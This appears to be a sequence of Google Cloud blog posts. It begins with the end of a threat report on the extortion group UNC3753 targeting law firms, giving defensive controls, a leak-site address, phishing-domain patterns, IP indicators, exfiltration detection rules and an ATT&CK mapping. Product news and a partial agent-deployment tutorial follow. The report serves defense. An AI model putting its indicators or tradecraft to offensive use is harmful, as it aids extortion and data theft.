Implement rigid out-of-band identity verification controls for all external contractors, technical staff, and facilities visitors. Mandate the following physical controls:

Require visitors to display official credentials and photo identification.
Require front-desk staff to copy and log all physical visitor IDs before granting access.
Verify the arrival of all technicians against pre-scheduled work orders directly with the verified parent organization or helpdesk dispatcher.
Enforce a policy requiring physical technical service personnel to be escorted by a corporate supervisor at all times.

Remote Access Conditional Access Controls

Implement conditional access policies for remote access so that only corporate-owned devices can authenticate to virtual desktop infrastructure (VDI) or virtual private network (VPN) services. This gives the organization greater control over, and visibility into, potential Remote Monitoring and Management (RMM) usage.

Enforce Strict RMM and Screen-Sharing Software Controls

Audit corporate environments to block the installation and execution of unauthorized remote monitoring, management, and support utilities. Enforce application control policies (e.g. Windows Defender Application Control or third-party endpoint protection tools) to restrict execution of non-approved binaries. Organizations may also consider restricting interactive screen-control features within authorized virtual meeting platforms like Zoom and Teams.

Endpoint Removable Media Hardening

To neutralize physical exfiltration vectors, disable read/write capabilities for all external USB mass storage devices. Enforce Group Policy Objects (GPOs) or MDM configurations to restrict:

USB storage device installation.
Removable media access.
Optical media writes on all corporate endpoints and BYOD systems utilizing VDI entry.

Network Monitoring and Egress Control

Monitor firewall logs, network flows, and endpoint execution logs for indicative exfiltration and staging actions. Specifically:

Block or alert on outbound connections to unauthorized file-sharing APIs and consumer email services.
Ensure full session logging, including bytes transferred, is enabled in firewall log configurations.
Monitor SSH traffic (Port 22) from internal VDIs and endpoints for high-volume WinSCP and Rclone transfers.
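As a rough illustration of the last item, the sketch below sums bytes sent to port 22 per internal source and flags sources that reach a threshold. The `Flow` record shape, its field names, the sample addresses, and the 1 GiB threshold are all assumptions made for illustration; they are not values from GTIG or from any particular firewall product, so adapt them to whatever your flow logs actually export.

```python
from collections import defaultdict
from dataclasses import dataclass

SSH_PORT = 22
# Hypothetical alert threshold (1 GiB); tune it to your own baseline.
THRESHOLD_BYTES = 1 * 1024**3


@dataclass(frozen=True)
class Flow:
    """Assumed shape of one exported flow record."""
    src_ip: str
    dst_ip: str
    dst_port: int
    bytes_sent: int


def high_volume_ssh_sources(flows, threshold=THRESHOLD_BYTES):
    """Return {src_ip: total_bytes} for sources whose SSH volume meets the threshold."""
    totals = defaultdict(int)
    for flow in flows:
        if flow.dst_port == SSH_PORT:
            totals[flow.src_ip] += flow.bytes_sent
    return {src: total for src, total in totals.items() if total >= threshold}


# Illustrative records only (documentation address ranges).
sample = [
    Flow("10.0.0.5", "203.0.113.10", 22, 900 * 1024**2),
    Flow("10.0.0.5", "203.0.113.10", 22, 300 * 1024**2),
    Flow("10.0.0.9", "203.0.113.20", 443, 5 * 1024**3),
    Flow("10.0.0.7", "203.0.113.30", 22, 10 * 1024**2),
]
print(high_volume_ssh_sources(sample))
```

A port-based filter like this would miss SFTP or Rclone transfers that run over non-standard ports, so it is best treated as one signal alongside endpoint execution logs.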

Application Log and Access Auditing

Review authentication and access metrics for critical document stores to identify bulk harvesting profiles.

Configure real-time alerts in iManage, SharePoint, and corporate email directories for rapid file searches, search-term spikes, and mass file downloads.
Implement multi-factor authentication (MFA) on business critical data repository applications, such as iManage.
Implement strict BYOD authentication controls, requiring MFA step-up queries when accessing VDI nodes.
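The mass-download alerting described above can be approximated offline with a sliding-window count per user. This is a minimal sketch under stated assumptions: the `(timestamp, user)` event shape, the 10-minute window, and the 50-download limit are hypothetical and do not reflect the audit log schema of iManage, SharePoint, or any other product.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Hypothetical thresholds; derive real ones from normal user behavior.
WINDOW = timedelta(minutes=10)
MAX_DOWNLOADS = 50


def bulk_download_users(events, window=WINDOW, max_downloads=MAX_DOWNLOADS):
    """Return users who exceed max_downloads within any sliding window.

    events: iterable of (timestamp, user) tuples, one per file download.
    """
    recent = defaultdict(deque)  # user -> timestamps inside the current window
    flagged = set()
    for ts, user in sorted(events):
        timestamps = recent[user]
        timestamps.append(ts)
        # Drop timestamps that have fallen out of the window.
        while ts - timestamps[0] > window:
            timestamps.popleft()
        if len(timestamps) > max_downloads:
            flagged.add(user)
    return flagged


start = datetime(2026, 6, 1, 9, 0)
# 60 downloads in about five minutes versus one download every 15 minutes.
burst = [(start + timedelta(seconds=5 * i), "alice") for i in range(60)]
steady = [(start + timedelta(minutes=15 * i), "bob") for i in range(60)]
print(bulk_download_users(burst + steady))
```

The same structure works for search-term spikes if each event represents a search instead of a download.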

Outlook and Implications

The targeting of US legal and professional services organizations by financially motivated actors is a persistent industry risk. Legal services firms represent high-value targets for extortion actors. They maintain concentrated repositories of extremely sensitive client transaction files, merger and acquisition plans, client trade secrets, and corporate regulatory reports. Threat groups recognize that legal entities are subject to heavy reputational and regulatory exposure and may be highly motivated to resolve extortion situations quietly to protect their professional standing.

Threat actors recognize that targeting the human element—specifically using voice-guided social engineering—enables them to easily bypass robust technical perimeters, web security gateways, and MFA configurations.

Finally, the integration of in-person, physical intrusions represents an escalation in threat capability. While log-based defenses and endpoint telemetry have matured, physical corporate boundaries are frequently protected only by administrative procedures. Organizations must transition to a unified security posture that treats physical facility access control and endpoint-based hardware policies as equal components of their defensive perimeter.

Data Leak Site (DLS)

UNC3753 utilizes the following web platform to disclose the identities of victims and their compromised data.

hxxps[:]//business-data-leaks[.]com

Phishing Domains

GTIG identified infrastructure registrations by suspected UNC3753 actors utilizing specific naming conventions, assessed as supporting their ongoing social engineering and vishing activities.

<organization>-itdesk[.]com
<organization>-it[.]com
<organization>-helpdesk[.]com
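For defenders who want to check newly observed domains against these conventions, the following sketch builds a regular expression from the three suffixes listed above. The organization name `examplecorp` and the sample domain list are hypothetical, and the function names are illustrative rather than part of any GTIG tooling.

```python
import re

# Suffixes taken from the naming conventions listed above.
SUFFIXES = ("itdesk", "it", "helpdesk")


def lookalike_pattern(org_name):
    """Build a regex matching <org>-itdesk.com, <org>-it.com, and <org>-helpdesk.com."""
    org = re.escape(org_name.lower())
    suffixes = "|".join(SUFFIXES)
    return re.compile(rf"^{org}-(?:{suffixes})\.com$")


def find_lookalikes(org_name, domains):
    """Return the domains that match the lookalike pattern for org_name."""
    pattern = lookalike_pattern(org_name)
    # Normalize case, whitespace, and a trailing DNS root dot before matching.
    return [d for d in domains if pattern.match(d.strip().lower().rstrip("."))]


observed = [
    "examplecorp-itdesk.com",
    "ExampleCorp-Helpdesk.com",
    "examplecorp-it.com",
    "examplecorp.com",
    "examplecorp-italy.com",
    "examplecorp-it.com.evil.net",
]
print(find_lookalikes("examplecorp", observed))
```

The pattern is anchored at both ends so that the organization's legitimate domain and unrelated hostnames that merely contain the string are not flagged.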

Indicators of Compromise (IOCs)

To assist the wider community in hunting and identifying activity outlined in this blog post, we have included indicators of compromise (IOCs) in a GTI Collection for registered users.

IOC Type	Indicator
IPv4 Address	192.236.147.131
IPv4 Address	192.236.147.138
IPv4 Address	193.141.60.212
IPv4 Address	192.236.154.158
IPv4 Address	192.236.146.173
IPv4 Address	174.169.162.62
IPv4 Address	64.94.84.97
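One simple way to hunt for these addresses is to scan text logs for any IPv4 string and compare it against the list. The sketch below does that with the Python standard library; the IP addresses are copied from the table above, while the log line format and the function name are assumptions for illustration.

```python
import ipaddress
import re

# IPv4 indicators copied from the table above.
IOC_IPS = frozenset(
    ipaddress.ip_address(ip)
    for ip in (
        "192.236.147.131",
        "192.236.147.138",
        "193.141.60.212",
        "192.236.154.158",
        "192.236.146.173",
        "174.169.162.62",
        "64.94.84.97",
    )
)

# Loose candidate match; ipaddress performs the real validation.
IPV4_CANDIDATE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def ioc_hits(log_lines):
    """Yield (line_number, ip) for every IOC address found in log_lines."""
    for number, line in enumerate(log_lines, start=1):
        for candidate in IPV4_CANDIDATE.findall(line):
            try:
                address = ipaddress.ip_address(candidate)
            except ValueError:
                continue  # e.g. 999.1.1.1 is not a valid address
            if address in IOC_IPS:
                yield number, str(address)


# Hypothetical log lines in an invented format.
logs = [
    "2026-06-01 allow 10.0.0.5 -> 192.236.147.131:22",
    "2026-06-01 allow 10.0.0.5 -> 8.8.8.8:53",
    "2026-06-01 deny 10.0.0.8 -> 64.94.84.97:443",
]
print(list(ioc_hits(logs)))
```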

Google Security Operations (SecOps)

Google SecOps customers have access to these broad category rules and more under the Mandiant Intel Emerging Threats rule pack. The activity discussed in the blog post is detected in Google SecOps under the rule names:

Execute MSI Files Downloaded via Curl
Suspected Rclone Exfiltration

MITRE ATT&CK

Tactic	Technique ID	Technique Name
Initial Access	T1566.004	Phishing: Spearphishing Voice
Initial Access	T1133	External Remote Services
Execution	T1204.002	User Execution: Malicious File
	T1059.001	Command and Scripting Interpreter: PowerShell
	T1059.003	Command and Scripting Interpreter: Windows Command Shell
	T1569.002	System Services: Service Execution
Persistence	T1053.005	Scheduled Task/Job: Scheduled Task
Persistence	T1547.001	Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
Defense Evasion	T1036.005	Masquerading: Match Legitimate Name or Location
	T1553.002	Subvert Trust Controls: Code Signing
	T1562.001	Impair Defenses: Disable or Modify Tools
	T1070.001	Indicator Removal: Clear Windows Event Logs
Credential Access	T1003.001	OS Credential Dumping: LSASS Memory
Credential Access	T1003.002	OS Credential Dumping: Security Account Manager
Discovery	T1083	File and Directory Discovery
	T1135	Network Share Discovery
	T1046	Network Service Discovery
Lateral Movement	T1219	Remote Access Software
	T1021.001	Remote Services: Remote Desktop Protocol
	T1021.004	Remote Services: SSH
Collection	T1005	Data from Local System
Command & Control	T1572	Protocol Tunneling
Exfiltration	T1020	Automated Exfiltration
	T1567.002	Exfiltration Over Web Service: Exfiltration to Cloud Storage
	T1052.001	Exfiltration Over Physical Medium: Exfiltration over USB
Impact	T1486	Data Encrypted for Impact

What's new for Managed Service for Apache Spark clusters

Thu, 04 Jun 2026 16:00:00 +0000

At Google Cloud, our goal is to let you run large-scale analytical and data science workloads with maximum efficiency so you can process big data pipelines, machine learning, and ETL tasks.

We recently announced that the Dataproc service is now Managed Service for Apache Spark, reflecting our deep integration with the Agentic Data Cloud.

To support the diverse architectural needs of today’s modern data teams, we offer the service in two distinct deployment modes: serverless and managed clusters. The serverless deployment mode completely abstracts infrastructure management for ephemeral or ad-hoc jobs, while the managed clusters deployment mode is designed for teams that require fine-grained infrastructure customization, persistent environments, long-running stateful processing, or native integration with custom Compute Engine hardware configurations.

When it comes to managed cluster deployments, we’ve re-imagined the experience from the ground up, focusing on three core pillars: making Spark faster by supercharging execution speeds, easier to run by maximizing resource obtainability and reducing operational overhead, and smarter by embedding AI directly into the development and operational lifecycle.

This blog post focuses specifically on what we announced at Google Cloud Next ‘26 for the Managed Spark clusters deployment mode: enhanced flexibility to fine-tune performance and cost through a native execution engine, smarter scaling policies, and Gemini-powered extensions. For the latest on the serverless deployment mode, check out this blog.

Faster, with the Lightning Engine native execution engine

Arguably the biggest update for Managed Spark clusters is Lightning Engine, which introduces massive performance gains for Spark DataFrame/Dataset APIs and heavy Spark SQL queries. Powered by a native, C++ vectorized execution engine built on Velox and Gluten, with specialized internal enhancements, Lightning Engine bypasses JVM execution bottlenecks by compiling query plans into native instructions optimized for SIMD (Single Instruction, Multiple Data) vectorization.

This native execution engine delivers:

Up to 4.9x faster performance than standard open-source Spark
Up to 2x the price-performance of the leading high-speed Spark alternative

Crucially, taking advantage of these performance gains doesn’t require any code changes to your existing Spark applications. Because your jobs complete faster, you directly reduce your aggregate Compute Engine runtime hours and overall spend.
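To make the cost effect concrete, here is a small back-of-the-envelope sketch. The baseline runtime and hourly rate are hypothetical numbers, the 4.9x factor is the best case quoted above rather than a guaranteed result, and the calculation assumes the same hourly rate before and after, which may not match actual pricing.

```python
def runtime_after_speedup(baseline_hours, speedup):
    """Return the runtime in hours after applying a speedup factor."""
    if speedup <= 0:
        raise ValueError("speedup must be positive")
    return baseline_hours / speedup


def estimated_savings(baseline_hours, speedup, hourly_rate):
    """Cost difference between baseline and accelerated runs at the same hourly rate."""
    faster_hours = runtime_after_speedup(baseline_hours, speedup)
    return (baseline_hours - faster_hours) * hourly_rate


# Hypothetical workload: 49 cluster-hours at an assumed rate of 10.0 per hour.
print(runtime_after_speedup(49.0, 4.9))
print(estimated_savings(49.0, 4.9, 10.0))
```

Real workloads will see different factors depending on how much of the job runs through the DataFrame/Dataset and Spark SQL paths that the engine accelerates.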

To enable Lightning Engine on your managed clusters, simply specify the Lightning Engine option when you’re creating a cluster.

Learn technical details and hear Lowe’s experience with Lightning Engine

Easier: Maximize resource obtainability via Flexible VMs

Temporary localized shortages of a specific machine type can stall cluster creation or interrupt autoscaling. To dramatically improve cluster resilience against capacity constraints, Flexible VMs for Managed Spark clusters are now generally available.

Flexible VMs allow you to define up to ten ranked machine types for your master, primary, and secondary worker nodes. Managed Service for Apache Spark pairs this preference with automated regional zone placement, dynamically scanning the entire region to fulfill your capacity requests using the best available hardware layout. This helps ensure your pipelines spin up predictably, drastically reducing resource availability errors, and maximizing your ability to capture cost-effective Spot VM capacity during periods of peak demand.
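Conceptually, a ranked preference list combined with zone scanning behaves like an ordered fallback search. The sketch below illustrates that idea only; it is not how the service is implemented, and the function name, the availability map, and the sample capacity data are all hypothetical.

```python
MAX_RANKED_TYPES = 10  # the limit stated above


def pick_machine_type(ranked_types, available_by_zone):
    """Return (machine_type, zone) for the highest-ranked type with capacity, or None.

    ranked_types: machine types in preference order.
    available_by_zone: hypothetical map of zone -> set of machine types with capacity.
    """
    if len(ranked_types) > MAX_RANKED_TYPES:
        raise ValueError("at most ten ranked machine types are allowed")
    for machine_type in ranked_types:
        # Scan zones in a stable order so results are reproducible.
        for zone in sorted(available_by_zone):
            if machine_type in available_by_zone[zone]:
                return machine_type, zone
    return None


ranked = ["n2-standard-8", "n2d-standard-8", "e2-standard-8"]
capacity = {
    "us-central1-a": {"e2-standard-8"},
    "us-central1-b": {"n2d-standard-8", "e2-standard-8"},
}
print(pick_machine_type(ranked, capacity))
```

In this invented scenario the first choice has no capacity anywhere in the region, so the search falls through to the second-ranked type instead of failing.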

Easier: Zero-scale clusters and scheduled stops

To give you better fiscal control over persistent and developmental environments, we recently announced the general availability of two highly requested FinOps features: zero-scale clusters and cluster scheduled stops.

Zero-scale clusters: You can now provision environments that use exclusively secondary workers (Spot VMs), enabling the cluster to automatically scale down to absolutely zero worker nodes when no processing is active, leaving only the master node online to preserve metadata.
Cluster scheduled stops: This feature lets you configure automated cluster shutdown policies based on specific idle-time limits or a precise future timestamp.

Because these features are natively integrated, they remove the operational friction of deleting and reconstructing your environment, and you stop paying for idle compute during nights and weekends.
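The two scheduled-stop triggers described above, an idle-time limit or a fixed future timestamp, amount to a simple either-or check. The following sketch shows that logic in isolation; the function and parameter names are hypothetical and are not the service's configuration fields.

```python
from datetime import datetime, timedelta, timezone


def should_stop(now, last_activity, idle_limit=None, stop_at=None):
    """Return True if either configured stop condition is met.

    idle_limit: optional timedelta of allowed idleness.
    stop_at: optional absolute datetime at which to stop.
    """
    if stop_at is not None and now >= stop_at:
        return True
    if idle_limit is not None and now - last_activity >= idle_limit:
        return True
    return False


now = datetime(2026, 6, 5, 22, 0, tzinfo=timezone.utc)
last_job = now - timedelta(minutes=45)

# Idle for 45 minutes against a 30-minute limit.
print(should_stop(now, last_job, idle_limit=timedelta(minutes=30)))
# Fixed stop time one hour in the future and no idle limit.
print(should_stop(now, last_job, stop_at=now + timedelta(hours=1)))
```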

Smarter: Managed Service for Apache Spark MCP Server

To bridge the gap between generative AI and data engineering, we launched the Model Context Protocol (MCP) server for Managed Service for Apache Spark. This open-standard integration allows LLMs and AI assistants to securely and dynamically interact with your Managed Spark clusters using natural language.

By utilizing the MCP server, your AI agents can securely connect to your data platform under existing IAM permissions. This allows agents to perform cluster-based operations, such as creating a cluster, submitting a job, or adjusting an autoscaling policy, directly from your AI application.

Smarter: Accelerating AI with the Data Agent Kit

The Google Cloud Data Agent Kit extension allows data scientists, engineers, and developers to manage their entire data workload lifecycle directly within their preferred development environment. We rolled out native support for this extension on Managed Spark clusters, enabling teams to seamlessly build and deploy specialized Data Agents for code generation and data wrangling.

Developers can choose to use Antigravity 2.0, Google's standalone, agentic development platform, or bring these agentic capabilities into their preferred IDE, including VS Code, Claude Code, or Codex, via the Data Agent Kit extensions and plugins. By pairing this streamlined workflow with the raw processing power of managed clusters, these intelligent agents can securely execute complex workflows directly over petabyte-scale data lakes. Specifically, the Data Agent Kit enables developers to:

Build and orchestrate pipelines: Author multi-node data pipelines and generate comprehensive code documentation using natural language.
Perform real-time debugging: Leverage Gemini Cloud Assist to sift through executor logs, pinpoint root causes of job failures, and recommend actionable fixes.
Easily connect to Spark resources: Instantly attach to serverless Spark runtimes or managed clusters without manual network configuration or local Spark installations.
Streamline Git and CI/CD management: Commit, merge, and deploy code directly from your IDE of choice, triggering automated testing and deployment pipelines without friction.

Smarter: Next-generation Lakehouse

We recently launched Lakehouse, which delivers read/write interoperability between engines like Managed Service for Apache Spark and BigQuery. By leveraging the Lakehouse runtime catalog as a unified, serverless metadata layer, it removes data silos and the need for complex translation layers. This agentic-first approach allows organizations to process open formats directly from Google Cloud Storage, or even query remote AWS datasets using the newly introduced cross-cloud Lakehouse, all while maintaining a single source of truth for security and governance.

For customers utilizing Managed Spark clusters, this integration unlocks several powerful new capabilities. Data teams can now accelerate their most demanding ETL and data science workloads by up to 4.9x using the optimized Lightning Engine.

Next-gen runtimes: Cluster Image 3.0 with Spark 4.1

Keeping pace with the open-source ecosystem, we rolled out Cluster Image 3.0 in preview, built with Apache Spark 4.1 and featuring an upgraded default Java runtime, Java 21. Spark 4.1 introduces a set of core open-source capabilities, including real-time mode for structured streaming. This enables your Spark environment to support real-time streaming with continuous, sub-second latency processing.

Get started today

These updates are live and ready to use today in Managed Spark clusters! You can enable these new features directly through the Google Cloud console or via the gcloud CLI.

To spin up a new managed cluster and unlock the performance of Lightning Engine, run the following command in your terminal:

```
gcloud dataproc clusters create my-optimized-cluster \
 --region=us-central1 \
 --image-version=2.3 \
 --engine=lightning
```

Alternatively, navigate to the Managed Service for Apache Spark page in the console, click Create cluster, and select ‘Enable Lightning Engine’ under the cluster configuration settings to automatically activate Lightning Engine for your Spark jobs.

We look forward to hearing about the environments you build and run as Managed Service for Apache Spark clusters!

What’s new with Google Data Cloud

Thu, 04 Jun 2026 16:00:00 +0000

June 1 - June 5

Beyond the Query: Powering AI Agents with Bigtable, Firestore & Memorystore
Discover the latest advancements in Google Cloud's NoSQL Database portfolio, including Bigtable, Firestore, and Memorystore. This series is designed for a broad audience: whether you are exploring these databases for the first time or are an existing user looking to leverage the new capabilities announced at Next '26.

Register here to secure your spot!

Cloud Engineer's AI Toolkit Workshops: Solve data-driven challenges with BigQuery, AlloyDB, Gemini and more. Hosted by Google Cloud Labs, this highly technical event is built specifically for Platform Engineers, SREs, and cloud infrastructure teams ready to bridge the gap between AI prototypes and production-grade deployments. Look out for more locations coming soon.

Toronto - June 25 (Data Cloud) | RSVP Here
Chicago - June 30 (Data Cloud) | RSVP Here
Start a 10-day Bigtable free trial with a 1-node SSD cluster and up to 500 GB of storage capacity. With no credit card required to start, you can easily ingest data and manage workloads that require low-latency, high-throughput, and predictable access. Plus, new Google Cloud customers get $300 in free credits on signup.

May 11 - May 15

Managed Service for Apache Airflow has launched a wave of new features, including the general availability of Airflow 3.1, AI-powered agentic troubleshooting, a new managed Airflow MCP Server for custom agent integration, and declarative YAML-based orchestration pipelines—discover all the details in the full blog post.

April 20 - April 24

Google-built ODBC Driver for BigQuery is now available in Preview
We are excited to announce the launch of the new, Google-built ODBC driver for BigQuery. This new open-source driver provides a direct, high-performance connection for applications to BigQuery and is developed entirely in-house by Google. Download the new driver and connect your application to BigQuery.

April 13 - April 17

We announced we are reintroducing Data Studio to play a significant role in the AI era, expanding from data visualizations and reports to host BigQuery conversational agents and data apps built in Colab notebooks.
We announced BigQuery Graph is now available in preview, offering an easy-to-use, highly scalable graph analytics solution, empowering data professionals to model, analyze and visualize massive-scale relationships in an entirely new way.

April 6 - April 10

We introduced Conversational Analytics for Looker Embedded environments, enabling users to add natural language experiences to their own custom data-driven applications, powered by Gemini.
We expanded Looker’s capabilities for faster ad-hoc analysis, with the introduction of self-service Explores, enabling you to bring your own data to Looker’s semantic layer and gain instant access to insights in a governed data environment.

March 23 - March 27

We showed you how you can scale your reads with Cloud SQL autoscaling read pools. This feature allows you to provision multiple read replicas that are accessible via a single read endpoint and to dynamically adjust your read capability based on real-time application needs.
Our customers are leveraging the full power of Conversational Analytics and Looker to drive major business and technical breakthroughs in the AI era. Companies like Telenor, Pet Circle, Fluent Commerce, Lighthouse Intelligence, Wego, and ROLLER are turning data into insights and actions, grounded by Looker’s semantic layer.

March 16 - March 20

We introduced an enhanced Gemini assistant in BigQuery Studio, transforming the agent from a code assistant into a fully context-aware analytics partner.

February 23 - February 27

We introduced managed and remote MCP support for Google Cloud databases, including AlloyDB, Spanner, Cloud SQL, Bigtable and Firestore, to power the next generation of agents. This announcement extends the ability for AI models to plan, build, and solve complex problems, connecting to the database tools our customers leverage daily as the backbone of their work environment.
We outlined how you can build a conversational agent in BigQuery using the Conversational Analytics API to help you build context-aware agents that can understand natural language, query your BigQuery data, and deliver answers in text, tables, and visual charts.

February 16 - February 20

Our customers are leveraging the full power of Looker to drive major business and technical breakthroughs. Companies like Arrive, Audika, Carousell, Framebridge, GumGum, Intel, Overdose Digital, Ocean Network Express, Subskribe and Promevo are leveraging Looker’s newest AI-driven capabilities, including Conversational Analytics, to transform data to insights and actions, and empower their entire organization with a single source of truth, powered by Looker’s semantic layer.

February 2 - February 6

Join us on March 4 for our webinar, Win Your AI Strategy with Cloud SQL Enterprise Plus, to learn how to power your generative AI workloads with 3x higher performance and 99.99% availability. Register today to discover how to build a scalable, enterprise-grade foundation for your most demanding AI applications.

January 26 - January 30

We introduced Conversational Analytics in BigQuery, which allows users to analyze data using natural language. Conversational Analytics in BigQuery is an intelligent agent that generates, executes and visualizes answers grounded in your business context directly in BigQuery Studio, making data insights for data professionals more conversational.
We outlined how data products have become the foundation for AI agents, providing the context needed to make autonomous agents reliable and trusted for real business use, backed by organized business logic and semantic understanding.
We highlighted how you can supercharge data analytics workflows, and outlined Google Cloud’s AI agent offerings for data engineering, data science, and development tools, so you can integrate agentic workflows in your applications, empower your teams and speed discovery.

January 19 - January 23

We have fundamentally reimagined Firestore with pipeline operations for Enterprise edition. Experience a powerful new engine featuring over a hundred new query features, index-less queries, new index types, and observability tooling to improve query performance. Seamlessly migrate using built-in tools and leverage Firestore’s existing differentiated serverless foundation, virtually unlimited scale, and industry-leading SLA. Join a community of 600K developers to craft expressive applications that maximize the benefits of rich queryability, real-time listen queries, robust offline caching, and cutting-edge AI-assistive coding integrations.
Introducing Google Cloud SQL on MSSQLTips: We are highlighting a new technical guide published on MSSQLTips titled "Introducing Google Cloud SQL." This article serves as an essential resource for SQL Server administrators and developers exploring Google Cloud's fully managed database service. It provides a detailed overview of Cloud SQL capabilities, including high availability, security integration, and the seamless transition of on-premises SQL Server workloads to the cloud, making it an ideal resource for those planning their migration strategy.
We are excited to announce the Public Preview of Microsoft Entra ID (formerly Azure Active Directory) integration with Cloud SQL for SQL Server. Designed to tackle the challenge of identity sprawl in multi-cloud environments, this integration allows organizations to govern database access using their existing Microsoft identity infrastructure. Key benefits include centralized identity management, enhanced security features like Multi-Factor Authentication (MFA), and simplified user administration through direct group mapping. This feature is available for SQL Server 2022 and supports both public and private IP configurations.

January 12 - January 16

Google-built JDBC Driver for BigQuery is now available in Preview
We are excited to announce the launch of the new, Google-built JDBC driver for BigQuery. This new open-source driver provides a direct, high-performance connection for Java applications to BigQuery and is developed entirely in-house by Google. Download the new driver and connect your Java application to BigQuery.
Troubleshoot Airflow tasks instantly with Gemini Cloud Assist investigations: Cloud Composer just got smarter. We are excited to announce that Gemini Cloud Assist investigations are now available directly within Cloud Composer 3. Instead of manually sifting through raw logs, you can now simply click "Investigate" on a failed Airflow task. Gemini analyzes logs and task metadata to identify failure patterns—such as resource exhaustion or timeouts—and provides actionable recommendations driven by Gemini Cloud Assist to resolve the issue. This integration shifts the debugging experience from manual toil to automated root cause analysis, significantly reducing the time required to restore your pipelines. Learn more about AI-assisted troubleshooting.

Scaling AI Agents: A Step-by-Step Guide to Deploying ADK on GKE Autopilot

Thu, 04 Jun 2026 07:00:00 +0000

While building AI agents locally using Google’s Agent Development Kit (ADK) is an excellent way to prototype, production-ready agents require a robust, scalable infrastructure. For developers looking to move beyond simple instances and into the world of managed container orchestration, Google Kubernetes Engine (GKE) Autopilot offers the perfect balance of flexibility and ease of use.

In this tutorial, I will walk you through building a technical agent with ADK and deploying it to GKE Autopilot. We will use Gemini on Vertex AI as the core model and follow security best practices by using Workload Identity for permission management.

Understanding the GKE ADK Architecture

Deploying an ADK agent on GKE Autopilot involves more than just running a container. We leverage GKE's native capabilities to handle scaling and security. Our architecture consists of an ADK-based Python application packaged as a Docker image and stored in Artifact Registry. This container runs as a Deployment on GKE Autopilot, where it communicates securely with Vertex AI using Workload Identity—mapping a Kubernetes Service Account to a Google Cloud IAM Service Account.

To expose the agent to the world, we use the Kubernetes Gateway API, the modern successor to Ingress, which provides a cleaner separation of concerns and native support for Google Cloud Load Balancing.

Prerequisites

Before we begin, ensure you have the following tools and accounts ready:

Python 3.10 or higher.
uv for package management.
Google Cloud SDK (gcloud) installed and configured.
A Google Cloud project with billing enabled.
kubectl command-line tool.
jq for parsing JSON responses.
The following APIs enabled: Kubernetes Engine, Artifact Registry, and Vertex AI.

Step 0: Configuring Google Cloud and Authentication

Before interacting with Google Cloud services, you must authenticate your environment and set the active project. This ensures that both the gcloud CLI and your local Python environment can access Vertex AI.

Log in with the Google Cloud SDK:
```
gcloud auth login
```
Set your active project:
```
gcloud config set project [PROJECT_ID]
```
Set up Application Default Credentials (ADC): This is crucial for the ADK library to authenticate with Vertex AI during local testing.
```
gcloud auth application-default login
```
Define Environment Variables: To ensure we can easily reuse our configuration in subsequent steps, let's export our project, region, and cluster name as environment variables.
```
export PROJECT_ID=$(gcloud config get-value project)
export REGION=us-central1
export CLUSTER_NAME=adk-cluster
```

Step 1: Provisioning GKE Autopilot

GKE Autopilot is the recommended way to run Kubernetes without managing nodes. It allows you to focus on your agent deployment while Google manages the infrastructure. Starting the cluster creation now allows it to provision in the background while we build the agent.

gcloud container clusters create-auto $CLUSTER_NAME --region $REGION

While the cluster is provisioning, we can move on to building our agent.

Step 2: Building the Agent with ADK

First, let's create our agent. Start by creating a folder for the agent code:

mkdir adk-agent
cd adk-agent

Initialize a new Python project with uv:

uv init

Add the ADK dependency:

uv add google-adk

Create a new agent using the ADK CLI:

uv run adk create weather_agent

The command prompts you for four values:

Model for the root agent: choose gemini-2.5-flash (option 1).
Backend: choose Vertex AI (option 2).
Google Cloud project ID: enter your project ID.
Google Cloud region: enter a region of your choice, for example us-central1.

The previous command scaffolded a new directory weather_agent with the following structure:

weather_agent/
├── .env
├── __init__.py
└── agent.py

ADK expects the agent code to be in the agent.py file. Let's edit agent.py to add a simple tool for the agent.

from google.adk import Agent
# Define a simple tool for the agent
def get_weather(city: str) -> str:
    """Returns the current weather in a city."""
    return f"The weather in {city} is 90 degrees Fahrenheit and sunny."
# Initialize the agent with Vertex AI and Gemini
root_agent = Agent(
    name="weather_agent",
    model="gemini-2.5-flash",
    tools=[get_weather]
)

The agent.py file is the entry point for the agent. It is used to define the agent and its tools. The get_weather function is a simple tool that returns the current weather in a city. For the purpose of this tutorial, we are using a hardcoded value for the weather. In a real-world scenario, you would use an API to get the current weather.
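
To make the "real-world scenario" remark a little more concrete, here is a minimal sketch of how the tool body could be structured once it stops returning a constant. The `_FAKE_OBSERVATIONS` table and the `lookup_weather` helper are hypothetical stand-ins for a real weather API call and are not part of ADK; only the function shape (typed argument, docstring, string result) mirrors the tool above.

```python
from typing import Optional, Tuple

# Hypothetical stand-in for a weather API: a small in-memory table.
_FAKE_OBSERVATIONS = {
    "new york": (90, "sunny"),
    "london": (61, "cloudy"),
}


def lookup_weather(city: str) -> Optional[Tuple[int, str]]:
    """Return (temperature_f, condition) for a city, or None if unknown."""
    return _FAKE_OBSERVATIONS.get(city.strip().lower())


def get_weather(city: str) -> str:
    """Returns the current weather in a city."""
    observation = lookup_weather(city)
    if observation is None:
        # A readable message lets the model explain the problem to the user
        # instead of surfacing a stack trace.
        return f"No weather data is available for {city}."
    temperature_f, condition = observation
    return (
        f"The weather in {city} is {temperature_f} degrees Fahrenheit "
        f"and {condition}."
    )
```

Keeping the lookup in its own function means the tool can be unit-tested without starting the agent, and the table can later be swapped for an HTTP call without touching the tool's signature.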

Step 3: Testing the Agent Locally

Before deploying the agent to GKE Autopilot, we need to test it locally to ensure it works as expected. Run the following command to start the agent in debug mode with the web UI:

uv run adk web

Open http://localhost:8000 in your browser and you should see the ADK web UI. You can then interact with your agent by typing messages in the chat interface.

If the agent replies with a message like "The weather in [CITY] is 90 degrees Fahrenheit and sunny.", your ADK agent is working and you can proceed to the next step.

Step 4: Preparing for GKE Autopilot

The ADK CLI has a built-in command to deploy the agent to GKE. However, its default settings are not suitable for a production environment. For example, they do not use Workload Identity for authentication with Vertex AI, and they expose the Web UI via a Load Balancer on port 80.

We will instead manage the lifecycle of the container ourselves. First we need to containerize the agent.

Create a .dockerignore file in the adk-agent directory to keep your local virtual environment, caches, and .env file out of the image:

.venv
.adk
__pycache__
*.pyc
.env

Create a Dockerfile for your agent in the adk-agent directory. We will use a multi-stage build to keep the final production image lightweight and secure:

# Stage 1: Build the virtual environment
FROM python:3.10-slim AS builder

# Install uv
COPY --from=ghcr.io/astral-sh/uv:latest /uv /uvx /bin/

# Set working directory
WORKDIR /app

# Force uv to use the system Python and copy files instead of linking them
ENV UV_PYTHON_PREFERENCE=only-system
